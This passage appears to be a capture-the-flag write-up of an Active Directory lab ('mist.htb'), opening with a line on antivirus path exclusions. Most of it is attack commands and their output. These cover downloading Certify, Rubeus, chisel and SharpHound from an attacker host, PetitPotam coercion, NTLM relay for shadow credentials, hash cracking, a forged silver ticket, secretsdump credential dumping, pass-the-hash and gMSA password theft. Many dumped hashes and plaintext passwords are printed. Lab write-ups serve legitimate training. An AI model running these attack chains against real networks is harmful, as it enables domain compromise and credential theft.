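Path exclusions are evaluated as prefixes, so excluding C:\xampp silently covers C:\xampp\htdocs and every module directory under it; if a web root genuinely needs an exclusion for performance, scope it to the specific non-writable subtree and keep the upload and module directories scanned.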

PS C:\xampp\htdocs\data\modules\rev> iwr 10.10.14.129/Certify.exe -outfile cy.exe
PS C:\xampp\htdocs\data\modules\rev> .\cy.exe cas
  v1.0.0

[*] Action: Find certificate authorities
[*] Using the search base 'CN=Configuration,DC=mist,DC=htb'

[*] Root CAs

    Cert SubjectName              : CN=mist-DC01-CA, DC=mist, DC=htb
    Cert Thumbprint               : A515DF0E980933BEC55F89DF02815E07E3A7FE5E
    Cert Serial                   : 3BF0F0DDF3306D8E463B218B7DB190F0
    Cert Start Date               : 2/15/2024 7:07:23 AM
    Cert End Date                 : 2/15/2123 7:17:23 AM
    Cert Chain                    : CN=mist-DC01-CA,DC=mist,DC=htb

[*] NTAuthCertificates - Certificates that enable authentication:

    Cert SubjectName              : CN=mist-DC01-CA, DC=mist, DC=htb
    Cert Thumbprint               : A515DF0E980933BEC55F89DF02815E07E3A7FE5E
    Cert Serial                   : 3BF0F0DDF3306D8E463B218B7DB190F0
    Cert Start Date               : 2/15/2024 7:07:23 AM
    Cert End Date                 : 2/15/2123 7:17:23 AM
    Cert Chain                    : CN=mist-DC01-CA,DC=mist,DC=htb

[*] Enterprise/Enrollment CAs:

    Enterprise CA Name            : mist-DC01-CA
    DNS Hostname                  : DC01.mist.htb
    FullName                      : DC01.mist.htb\mist-DC01-CA
    Flags                         : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
    Cert SubjectName              : CN=mist-DC01-CA, DC=mist, DC=htb
    Cert Thumbprint               : A515DF0E980933BEC55F89DF02815E07E3A7FE5E
    Cert Serial                   : 3BF0F0DDF3306D8E463B218B7DB190F0
    Cert Start Date               : 2/15/2024 7:07:23 AM
    Cert End Date                 : 2/15/2123 7:17:23 AM
    Cert Chain                    : CN=mist-DC01-CA,DC=mist,DC=htb
    UserSpecifiedSAN              : Disabled
    CA Permissions                :
      Owner: BUILTIN\Administrators        S-1-5-32-544

      Access Rights                                     Principal

      Allow  Enroll                                     NT AUTHORITY\Authenticated UsersS-1-5-11
      Allow  ManageCA, ManageCertificates               BUILTIN\Administrators        S-1-5-32-544
      Allow  ManageCA, ManageCertificates               MIST\Domain Admins            S-1-5-21-1045809509-3006658589-2426055941-512
      Allow  ManageCA, ManageCertificates               MIST\Enterprise Admins        S-1-5-21-1045809509-3006658589-2426055941-519
    Enrollment Agent Restrictions : None

    Enabled Certificate Templates:
        BackupSvcAuthentication
        ManagerAuthentication
        UserAuthentication
        ComputerAuthentication
        DirectoryEmailReplication
        DomainControllerAuthentication
        KerberosAuthentication
        EFSRecovery
        EFS
        WebServer
        Machine
        User
        SubCA
        Administrator

Certify completed in 00:00:32.1879029
PS C:\xampp\htdocs\data\modules\rev> .\cy.exe find /vulnerable 
  v1.0.0

[*] Action: Find certificate templates
[*] Using the search base 'CN=Configuration,DC=mist,DC=htb'
[*] Listing info about the Enterprise CA 'mist-DC01-CA'

    Enterprise CA Name            : mist-DC01-CA
    DNS Hostname                  : DC01.mist.htb
    FullName                      : DC01.mist.htb\mist-DC01-CA
    Flags                         : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
    Cert SubjectName              : CN=mist-DC01-CA, DC=mist, DC=htb
    Cert Thumbprint               : A515DF0E980933BEC55F89DF02815E07E3A7FE5E
    Cert Serial                   : 3BF0F0DDF3306D8E463B218B7DB190F0
    Cert Start Date               : 2/15/2024 7:07:23 AM
    Cert End Date                 : 2/15/2123 7:17:23 AM
    Cert Chain                    : CN=mist-DC01-CA,DC=mist,DC=htb
    UserSpecifiedSAN              : Disabled
    CA Permissions                :
      Owner: BUILTIN\Administrators        S-1-5-32-544

      Access Rights                                     Principal

      Allow  Enroll                                     NT AUTHORITY\Authenticated UsersS-1-5-11
      Allow  ManageCA, ManageCertificates               BUILTIN\Administrators        S-1-5-32-544
      Allow  ManageCA, ManageCertificates               MIST\Domain Admins            S-1-5-21-1045809509-3006658589-2426055941-512
      Allow  ManageCA, ManageCertificates               MIST\Enterprise Admins        S-1-5-21-1045809509-3006658589-2426055941-519
    Enrollment Agent Restrictions : None

[+] No Vulnerable Certificates Templates found!

Certify completed in 00:00:09.0251909
Writeup-9.png

Probably our privilege escalation target is Sharon:

PS C:\users> ls
    Directory: C:\users
Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----         3/20/2024   6:28 AM                Administrator
d-----         2/20/2024   6:02 AM                Administrator.MIST
d-----         3/20/2024   5:42 AM                Brandon.Keywarp
d-r---         7/12/2024  12:20 PM                Public
d-----         2/20/2024   9:39 AM                Sharon.Mullard
d-----         2/21/2024   3:46 AM                svc_web

Generate Certificate

PS C:\xampp\htdocs\data\modules\rev> .\cy.exe request /ca:DC01.mist.htb\mist-DC01-CA /template:User
  v1.0.0

[*] Action: Request a Certificates

[*] Current user context    : MIST\Brandon.Keywarp
[*] No subject name specified, using current context as subject.

[*] Template                : User
[*] Subject                 : CN=Brandon.Keywarp, CN=Users, DC=mist, DC=htb

[*] Certificate Authority   : DC01.mist.htb\mist-DC01-CA

[*] CA Response             : The certificate had been issued.
[*] Request ID              : 64

[*] cert.pem         :


[*] Convert with: openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

Certify completed in 00:00:05.6046662
└─$ vi cert.pem
└─$ openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

Enter Export Password: Password123$
Verifying - Enter Export Password: Password123$
└─$ mv cert.pfx www

Get Ticket

For the next step, run Rubeus and ask for a ticket using the certificate:

PS C:\xampp\htdocs\files> iwr 10.10.14.73/cert.pfx -outfile cert.pfx
PS C:\xampp\htdocs\files> iwr 10.10.14.73/Rubeus.exe -outfile rb.exe
PS C:\xampp\htdocs\files> .\rb.exe asktgt /user:$ENV:USERNAME /certificate:C:\xampp\htdocs\files\cert.pfx /password:'Password123$' /getcredentials /show /nowrap
  v2.2.0

[*] Action: Ask TGT

[*] Using PKINIT with etype rc4_hmac and subject: CN=Brandon.Keywarp, CN=Users, DC=mist, DC=htb
[*] Building AS-REQ (w/ PKINIT preauth) for: 'mist.htb\Brandon.Keywarp'
[*] Using domain controller: 192.168.100.100:88
[+] TGT request successful!
[*] base64(ticket.kirbi):


  ServiceName              :  krbtgt/mist.htb
  ServiceRealm             :  MIST.HTB
  UserName                 :  Brandon.Keywarp
  UserRealm                :  MIST.HTB
  StartTime                :  7/17/2024 11:54:23 AM
  EndTime                  :  7/17/2024 9:54:23 PM
  RenewTill                :  7/24/2024 11:54:23 AM
  Flags                    :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType                  :  rc4_hmac
  Base64(key)              :  wMLcmCKd0Q3qzzHT71sbxA==
  ASREP (key)              :  82FFE546360BA580853FBE2E5B2DB524

[*] Getting credentials using U2U

  CredentialInfo         :
    Version              : 0
    EncryptionType       : rc4_hmac
    CredentialData       :
      CredentialCount    : 1
       NTLM              : DB03D6A77A2205BC1D07082740626CC9

Brandon User NTLM

We are able to authenticate with the NTLM hash:

└─$ proxychains netexec smb 192.168.100.100 -u 'mist.htb\Brandon.Keywarp' -H 'DB03D6A77A2205BC1D07082740626CC9' --shares
SMB         192.168.100.100 445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:mist.htb) (signing:True) (SMBv1:False)
SMB         192.168.100.100 445    DC01             [+] mist.htb\Brandon.Keywarp:DB03D6A77A2205BC1D07082740626CC9
SMB         192.168.100.100 445    DC01             [*] Enumerated shares
SMB         192.168.100.100 445    DC01             Share           Permissions     Remark
SMB         192.168.100.100 445    DC01             -----           -----------     ------
SMB         192.168.100.100 445    DC01             ADMIN$                          Remote Admin
SMB         192.168.100.100 445    DC01             C$                              Default share
SMB         192.168.100.100 445    DC01             IPC$            READ            Remote IPC
SMB         192.168.100.100 445    DC01             NETLOGON        READ            Logon server share
SMB         192.168.100.100 445    DC01             SYSVOL          READ            Logon server share

┌──(woyag㉿kraken)-[~/Desktop/Rooms/Mist/www]
└─$ proxychains netexec smb 192.168.100.101 -u 'mist.htb\Brandon.Keywarp' -H 'DB03D6A77A2205BC1D07082740626CC9' --shares
SMB         192.168.100.101 445    MS01             [*] Windows Server 2022 Build 20348 x64 (name:MS01) (domain:mist.htb) (signing:False) (SMBv1:False)
SMB         192.168.100.101 445    MS01             [+] mist.htb\Brandon.Keywarp:DB03D6A77A2205BC1D07082740626CC9
SMB         192.168.100.101 445    MS01             [*] Enumerated shares
SMB         192.168.100.101 445    MS01             Share           Permissions     Remark
SMB         192.168.100.101 445    MS01             -----           -----------     ------
SMB         192.168.100.101 445    MS01             ADMIN$                          Remote Admin
SMB         192.168.100.101 445    MS01             C$                              Default share
SMB         192.168.100.101 445    MS01             Common Applications READ,WRITE
SMB         192.168.100.101 445    MS01             IPC$            READ            Remote IPC

PetitPotam

└─$ proxychains python3 PetitPotam.py -u 'Brandon.Keywarp' -hashes ':DB03D6A77A2205BC1D07082740626CC9' -pipe all -d mist.htb 10.10.14.73 192.168.100.101
---
└─$ sudo responder -I tun0
[SMB] NTLMv2-SSP Client   : 10.10.11.17
[SMB] NTLMv2-SSP Username : MIST\MS01$
[SMB] NTLMv2-SSP Hash     : MS01$::MIST:a00d8a89c3f...

PetitPotam attack is successful!

Writeup-10.png

Crack the hash:

➜ .\hashcat.exe --show .\hashes
...
5600 | NetNTLMv2 | Network Protocol
...
➜ .\hashcat.exe -a 0 -m 5600 .\hashes .\rockyou.txt
...
Status...........: Exhausted
...

Unsuccessful...

Shadow Credentials

We can perform a Shadow Credentials attack by relaying the authentication coerced with the PetitPotam PoC to LDAP.

The attack flow looks like this:

Writeup-11.png
└─$ chisel server -p 36001
2024/07/18 01:06:00 server: Fingerprint tj15IDySSod3bMia5kDlPuu2K19SV+9rd/OU1IrFZwg=
2024/07/18 01:06:00 server: Listening on http://0.0.0.0:36001
---
PS C:\xampp\htdocs\files> Start-Job -ScriptBlock { & "C:\xampp\htdocs\files\chisel.exe" client 10.10.14.73:36001 4444:10.10.14.73:80; }
PS C:\xampp\htdocs\files> Receive-Job 5
...
2024/07/17 22:09:54 client: tun: proxy#4444=>10.10.14.73:80: Listening
2024/07/17 22:09:55 client: Connected (Latency 78.5714ms)

Verify connection:

Writeup-12.png

Without the WebDAV client (WebClient service) running this was not working; a script to enable it without admin rights can be found here: HOW TO START A “TRIGGER START” WINDOWS SERVICE WITH POWERSHELL WITHOUT ELEVATION / ADMIN RIGHTS

The script is like a steroid for PetitPotam and should be run before any PetitPotam command.

Impacket does not yet support shadow credentials in its interactive LDAP shell; the feature can be added via this pull request: Add Shadow Credentials Commands to Ntlmrelayx's Interactive LDAP Shell #1402

PS C:\xampp\htdocs\files> . .\enablewebdav.ps1
---
└─$ git clone https://github.com/Tw1sm/impacket.git -b interactive-ldap-shadow-creds
└─$ cd impacket
└─$ python -m venv venv
└─$ source ./venv/bin/activate
└─$ pip install -e .
# └─$ pip install pyOpenSSL==24.0.0 # Needed?
└─$ proxychains python examples/ntlmrelayx.py -t ldap://192.168.100.100 -domain mist.htb -smb2support -i
---
└─$ proxychains python3 PetitPotam.py -u 'Brandon.Keywarp' -hashes ':DB03D6A77A2205BC1D07082740626CC9' -pipe all -d mist.htb MS01@4444/yada 192.168.100.101
Writeup-13.png

Connect to the interactive LDAP shell and perform the Shadow Credentials attack:

└─$ nc 0 11000
Type help for list of commands

# help

 add_computer computer [password] [nospns] - Adds a new computer to the domain with the specified password. If nospns is specified, computer will be created with only a single necessary HOST SPN. Requires LDAPS.
 rename_computer current_name new_name - Sets the SAMAccountName attribute on a computer object to a new value.
 add_user new_user [parent] - Creates a new user.
 add_user_to_group user group - Adds a user to a group.
 change_password user [password] - Attempt to change a given users password. Requires LDAPS.
 clear_rbcd target - Clear the resource based constrained delegation configuration information.
 clear_shadow_creds target - Clear shadow credentials on the target (sAMAccountName).
 disable_account user - Disable the users account.
 enable_account user - Enable the users account.
 dump - Dumps the domain.
 search query [attributes,] - Search users and groups by name, distinguishedName and sAMAccountName.
 get_user_groups user - Retrieves all groups this user is a member of.
 get_group_users group - Retrieves all members of a group.
 get_laps_password computer - Retrieves the LAPS passwords associated with a given computer (sAMAccountName).
 grant_control target grantee - Grant full control of a given target object (sAMAccountName) to the grantee (sAMAccountName).
 set_dontreqpreauth user true/false - Set the dont require pre-authentication flag to true or false.
 set_rbcd target grantee - Grant the grantee (sAMAccountName) the ability to perform RBCD to the target (sAMAccountName).
 set_shadow_creds target - Set shadow credentials on the target object (sAMAccountName).
 start_tls - Send a StartTLS command to upgrade from LDAP to LDAPS. Use this to bypass channel binding for operations necessitating an encrypted channel.
 write_gpo_dacl user gpoSID - Write a full control ACE to the gpo for the given user. The gpoSID must be entered surrounding by {}.
 exit - Terminates this session.

# clear_shadow_creds MS01$
Found Target DN: CN=MS01,CN=Computers,DC=mist,DC=htb
Target SID: S-1-5-21-1045809509-3006658589-2426055941-1108

Shadow credentials cleared successfully!

# set_shadow_creds MS01$
Found Target DN: CN=MS01,CN=Computers,DC=mist,DC=htb
Target SID: S-1-5-21-1045809509-3006658589-2426055941-1108

KeyCredential generated with DeviceID: 0045b24e-7352-207f-8474-01870d422f59
Shadow credentials successfully added!
Saved PFX (#PKCS12) certificate & key at path: GtVRpuZy.pfx
Must be used with password: nlM1OVwbcXjdSqv21Go5

To check that the .pfx file is readable and the password is correct, we extract the certificate and key with OpenSSL and inspect the certificate:

└─$ mv ./impacket/GtVRpuZy.pfx .
└─$ openssl pkcs12 -in GtVRpuZy.pfx -nodes -passin pass:nlM1OVwbcXjdSqv21Go5 | openssl x509 -noout -text
Writeup-14.png

The output shows a self-signed certificate: subject and issuer are both MS01$, unlike Brandon's CA-issued certificate, whose subject carries the CN and DC attributes.

└─$ certipy-ad cert -pfx GtVRpuZy.pfx -password nlM1OVwbcXjdSqv21Go5 -export -out brandon.pfx
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Writing PFX to 'brandon.pfx'
└─$ proxychains certipy-ad auth -pfx brandon.pfx -username 'MS01$' -domain mist.htb -dc-ip 192.168.100.100 -debug
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[!] Could not find identification in the provided certificate
[*] Using principal: ms01$@mist.htb
[*] Trying to get TGT...
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.100.100:88  ...  OK
[*] Got TGT
[*] Saved credential cache to 'ms01.ccache'
[*] Trying to retrieve NT hash for 'ms01$'
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.100.100:88  ...  OK
[*] Got hash for 'ms01$@mist.htb': aad3b435b51404eeaad3b435b51404ee:e8c4ceb3a5abb43cb0ffc352caf843ae

Now we have a new PFX certificate, which we can again verify with OpenSSL, this time without a password. Then we authenticate with the new PFX just as we did before in the Pass the Certificate step, only now for the account MS01$.

After this we retrieve the NTLM hash of the computer account MS01$, the machine account of the domain-joined server MS01 (every domain-joined computer has such an account).

This hash can be used to authenticate to services that accept NTLM challenge/response authentication.

└─$ proxychains netexec smb 192.168.100.100 -u MS01$ -H e8c4ceb3a5abb43cb0ffc352caf843ae --rid-brute
SMB         192.168.100.100 445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:mist.htb) (signing:True) (SMBv1:False)
SMB         192.168.100.100 445    DC01             [+] mist.htb\MS01$:e8c4ceb3a5abb43cb0ffc352caf843ae
SMB         192.168.100.100 445    DC01             500: MIST\Administrator (SidTypeUser)
SMB         192.168.100.100 445    DC01             501: MIST\Guest (SidTypeUser)
SMB         192.168.100.100 445    DC01             502: MIST\krbtgt (SidTypeUser)
SMB         192.168.100.100 445    DC01             1000: MIST\DC01$ (SidTypeUser)
SMB         192.168.100.100 445    DC01             1124: MIST\svc_ca$ (SidTypeUser)
SMB         192.168.100.100 445    DC01             1125: MIST\svc_smb (SidTypeUser)
SMB         192.168.100.100 445    DC01             1135: MIST\svc_cabackup (SidTypeUser)

Enumerate SIDs

└─$ proxychains impacket-lookupsid -hashes ':e8c4ceb3a5abb43cb0ffc352caf843ae' 'mist.htb/MS01$@DC01.mist.htb' 0
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Brute forcing SIDs at DC01.mist.htb
[*] StringBinding ncacn_np:DC01.mist.htb[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-1045809509-3006658589-2426055941

The trailing 0 is the maxRid positional argument, the highest RID that lookupsid will try; with 0 no RIDs are brute-forced and only the domain SID is printed, which is all we need here.

With the machine account's NTLM hash and the domain SID, we can use impacket-ticketer to forge a Kerberos service ticket (a Silver Ticket) for one of MS01's SPNs, such as HOST/MS01.mist.htb, in the name of Administrator:

PS C:\xampp\htdocs\files> setspn -L MS01
Registered ServicePrincipalNames for CN=MS01,CN=Computers,DC=mist,DC=htb:
        tapinego/MS01
        tapinego/MS01.mist.htb
        TERMSRV/MS01
        TERMSRV/MS01.mist.htb
        WSMAN/MS01
        WSMAN/MS01.mist.htb
        RestrictedKrbHost/MS01.mist.htb
        HOST/MS01.mist.htb
        RestrictedKrbHost/MS01
        HOST/MS01
└─$ proxychains impacket-ticketer -domain mist.htb -domain-sid S-1-5-21-1045809509-3006658589-2426055941 -spn 'HOST/MS01.mist.htb' -nthash e8c4ceb3a5abb43cb0ffc352caf843ae -user-id 500 Administrator
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for mist.htb/Administrator
[*]     PAC_LOGON_INFO
[*]     PAC_CLIENT_INFO_TYPE
[*]     EncTicketPart
[*]     EncTGSRepPart
[*] Signing/Encrypting final ticket
[*]     PAC_SERVER_CHECKSUM
[*]     PAC_PRIVSVR_CHECKSUM
[*]     EncTicketPart
[*]     EncTGSRepPart
[*] Saving ticket in Administrator.ccache

Pass-The-Ticket

Finally, with the forged ticket for Administrator, we can use impacket-secretsdump to dump credentials from MS01:

└─$ KRB5CCNAME=Administrator.ccache proxychains impacket-secretsdump -k Administrator@MS01.mist.htb -no-pass
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[proxychains] Strict chain  ...  127.0.0.1:1080  ...  MS01.mist.htb:445  ...  OK
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xe3a142f26a6e42446aa8a55e39cbcd86
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:711e6a685af1c31c4029c3c7681dd97b:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:90f903787dd064cc1973c3aa4ca4a7c1:::
svc_web:1000:aad3b435b51404eeaad3b435b51404ee:76a99f03b1d2656e04c39b46e16b48c8:::
[*] Dumping cached domain logon information (domain/username:hash)
MIST.HTB/Brandon.Keywarp:$DCC2$10240#Brandon.Keywarp#5f540c9ee8e4bfb80e3c732ff3e12b28: (2024-07-18 17:50:58)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
MIST\MS01$:plain_password_hex:ea225d1f20a74b171fa565789acb908809c79b5a1a30ce85bf4e090bbaf79766b5f551501d09ea68d02dca0bb380d6de957822ea3715a2fd763adb6b8a6cf494581743bb8efd1f490dd6211cb052568f9b3b09677e9100dd55947dd3a2d9fd4236f1e0d9ff36fcf6f4f2b513680f8ccee910584e8241481982f01c79d5fda9722daa5ec9addd9d9fa8ef3ff57f7cc62a6eeaf9391197e3e036e60bd8e88b398171fc591de87b2de5ae35f574335169a099e3cbd5f91e008030ad1d590886126d6c951ff6640d7cf053aa2c5ff890538d8f44d01049a0075fe07545797deeda29e72bcad964168e26213ceeaa28e16bf4
MIST\MS01$:aad3b435b51404eeaad3b435b51404ee:e8c4ceb3a5abb43cb0ffc352caf843ae:::
[*] DPAPI_SYSTEM
dpapi_machinekey:0xe464e18478cf4a7d809dfc9f5d6b5230ce98779b
dpapi_userkey:0x579d7a06798911d322fedc960313e93a71b43cc2
[*] NL$KM
 0000   57 C8 F7 CD 24 F2 55 EB  19 1D 07 C2 15 84 21 B0   W...$.U.......!.
 0010   90 7C 79 3C D5 BE CF AC  EF 40 4F 8E 2A 76 3F 00   .|y<.....@O.*v?.
 0020   04 87 DF 47 CF D8 B7 AF  6D 5E EE 9F 16 5E 75 F3   ...G....m^...^u.
 0030   80 24 AA 24 B0 7D 3C 29  4F EA 4E 4A FB 26 4E 62   .$.$.}<)O.NJ.&Nb
NL$KM:57c8f7cd24f255eb191d07c2158421b0907c793cd5becfacef404f8e2a763f000487df47cfd8b7af6d5eee9f165e75f38024aa24b07d3c294fea4e4afb264e62
[*] _SC_ApacheHTTPServer
svc_web:MostSavagePasswordEver123
[*] Cleaning up...
[*] Stopping service RemoteRegistry

Using Pass-The-Hash, authenticate with evil-winrm as Administrator on the MS01 machine.

└─$ proxychains evil-winrm -i 192.168.100.101 -u Administrator -H 711e6a685af1c31c4029c3c7681dd97b
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17

Evil-WinRM shell v3.5

Info: Establishing connection to remote endpoint
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.100.101:5985  ...  OK
*Evil-WinRM* PS C:\Users\Administrator\Documents> ls
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> tree /f /a
C:.
+---Contacts
+---Desktop
|       user.txt
*Evil-WinRM* PS C:\Users\Administrator> cat desktop/user.txt
67271816f58aad52b020260599dad5ff

Privilege Escalation (DC01 op_Sharon.Mullard)

KeePass

*Evil-WinRM* PS C:\Users\Sharon.Mullard> tree /f /a
Folder PATH listing
Volume serial number is 560D-8100
C:.
+---Desktop
+---Documents
|       sharon.kdbx
|
+---Downloads
+---Pictures
|       cats.png
|       image_20022024.png
|
*Evil-WinRM* PS C:\Users\Sharon.Mullard> download Documents/sharon.kdbx
*Evil-WinRM* PS C:\Users\Sharon.Mullard> download Pictures/cats.png
*Evil-WinRM* PS C:\Users\Sharon.Mullard> download Pictures/image_20022024.png

cats.png is literally cats, but the date-stamped image is a screenshot:

image_20022024.png

We can see partial password: UA7cpa[#1!_*ZX

Generate a hash from the .kdbx file, which is the KeePass database:

└─$ keepass2john sharon.kdbx | tee sharon.hash
sharon:$keepass$*2*60000*0*ae4c58b24d564cf7e40298f973bfa929f494a285e48a70b719b280200793ee67*761ad6f646fff6f41a844961b4cc815dc4cd0d5871520815f51dd1a5972f6c55*6520725ffa21f113d82f5240f3be21b6*ce6d93ca81cb7f1918210d0752878186b9e8965adef69a2a896456680b532162*dda750ac8a3355d831f62e1e4e99970f6bfe6b7d2b6d429ed7b6aca28d3174dc

For hashcat to work, delete the sharon: prefix, check the hash type and start cracking with the known partial password as a mask prefix:

➜ .\hashcat.exe --show hashes
      # | Name                                                       | Category
  ======+============================================================+======================================
  13400 | KeePass 1 (AES/Twofish) and KeePass 2 (AES)                | Password Manager
  29700 | KeePass 1 (AES/Twofish) and KeePass 2 (AES) - keyfile only mode | Password Manager

➜ .\hashcat.exe -a 3 -m 13400 --increment --increment-min 14 --increment-max 20 hashes 'UA7cpa[#1!_*ZX?a?a?a?a?a?a'
...
$keepass$*2*60000*0*ae4c58b24d564cf7e40298f973bfa929f494a285e48a70b719b280200793ee67*761ad6f646fff6f41a844961b4cc815dc4cd0d58715208115f51dd1a5972f6c55*6520725ffa21f113d82f5240f3be21b6*ce6d93ca81cb7f1918210d0752878186b9e8965adef69a2a896456680b532162*dda750ac8a3355d8831f62e1e4e99970f6bfe6b7d2b6d429ed7b6aca28d3174dc:UA7cpa[#1!_*ZX@

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13400 (KeePass 1 (AES/Twofish) and KeePass 2 (AES))
Hash.Target......: $keepass$*2*60000*0*ae4c58b24d564cf7e40298f973bfa92...3174dc
...
Guess.Mask.......: UA7cpa[#1!_*ZX?a [15]
Guess.Queue......: 2/7 (28.57%) 
...
Started: Thu Jul 18 22:29:52 2024
Stopped: Thu Jul 18 22:30:35 2024

Open the database with KeePassXC on Linux.

Writeup-15.png

The password for the operative account is ImTiredOfThisJob:(

The Sharon.Mullard username fails to authenticate:

└─$ proxychains evil-winrm -i 192.168.100.100 -u 'Sharon.Mullard' -p 'ImTiredOfThisJob:('

There was another user with the same name in net user /domain, carrying an op_ prefix:

└─$ proxychains evil-winrm -i 192.168.100.100 -u 'op_Sharon.Mullard' -p 'ImTiredOfThisJob:('
*Evil-WinRM* PS C:\Users\op_Sharon.Mullard\Documents> whoami /all
User Name              SID
====================== ==============================================
mist\op_sharon.mullard S-1-5-21-1045809509-3006658589-2426055941-1122

Group Name                                  Type             SID                                            Attributes
=========================================== ================ ============================================== ==================================================
Everyone                                    Well-known group S-1-1-0                                        Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access     Alias            S-1-5-32-574                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users             Alias            S-1-5-32-580                                   Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15                                       Mandatory group, Enabled by default, Enabled group
MIST\Operatives                             Group            S-1-5-21-1045809509-3006658589-2426055941-1121 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication            Well-known group S-1-5-64-10                                    Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

Privilege Escalation (DC01 Administrator)

op_Sharon.Mullard has nothing in the home directory. Users on DC01:

*Evil-WinRM* PS C:\Users> ls
Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----         3/20/2024   5:56 AM                Administrator
d-----         2/21/2024   8:12 AM                Brandon.Keywarp
d-----         2/21/2024   7:40 AM                op_Sharon.Mullard
d-r---         1/26/2024   1:03 PM                Public

Collect domain information with SharpHound:

*Evil-WinRM* PS C:\Users\op_Sharon.Mullard> cd $ENV:TEMP
*Evil-WinRM* PS C:\Users\op_Sharon.Mullard\AppData\Local\Temp> iwr 10.10.14.73/SharpHound.exe -o sh.exe
*Evil-WinRM* PS C:\Users\op_Sharon.Mullard\AppData\Local\Temp> .\sh.exe -c all --zipfilename sh.zip
*Evil-WinRM* PS C:\Users\op_Sharon.Mullard\AppData\Local\Temp> download 20240718115608_sh.zip

ReadGMSAPassword (svc_ca$)

Check the Outbound Object Control of the user:

Writeup-16.png

Looks like we are dealing with certificates again, but first we have ReadGMSAPassword on svc_ca$.

Writeup-17.png
Writeup-18.png

NetExec: Dump gMSA

└─$ proxychains netexec ldap 192.168.100.100 -u op_Sharon.Mullard -p 'ImTiredOfThisJob:(' --gmsa
SMB         192.168.100.100 445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:mist.htb) (signing:True) (SMBv1:False)
LDAPS       192.168.100.100 636    DC01             [+] mist.htb\op_Sharon.Mullard:ImTiredOfThisJob:(
LDAPS       192.168.100.100 636    DC01             [*] Getting GMSA Passwords
LDAPS       192.168.100.100 636    DC01             Account: svc_ca$              NTLM: 132af7136478f26a1b227d08a508a526
Writeup-19.png

We can abuse the AddKeyCredentialLink permission on the svc_cabackup user:

Writeup-20.png
└─$ proxychains python pywhisker.py -d 192.168.100.100 -u 'svc_ca$' -H '132af7136478f26a1b227d08a508a526' --target 'svc_cabackup' --action add
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.100.100:389  ...  OK
[*] Searching for the target account
[*] Target user found: CN=svc_cabackup,CN=Users,DC=mist,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: 6529feae-d331-b3d6-504e-1c67adf602a6
[*] Updating the msDS-KeyCredentialLink attribute of svc_cabackup
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[+] Saved PFX (#PKCS12) certificate & key at path: z57wJR9G.pfx
[*] Must be used with password: LD1p4LICqueoUPg83OFA
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools
└─$ certipy-ad cert -pfx z57wJR9G.pfx -password 'LD1p4LICqueoUPg83OFA' -export -out svc_cabackup.pfx
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Writing PFX to 'svc_cabackup.pfx'
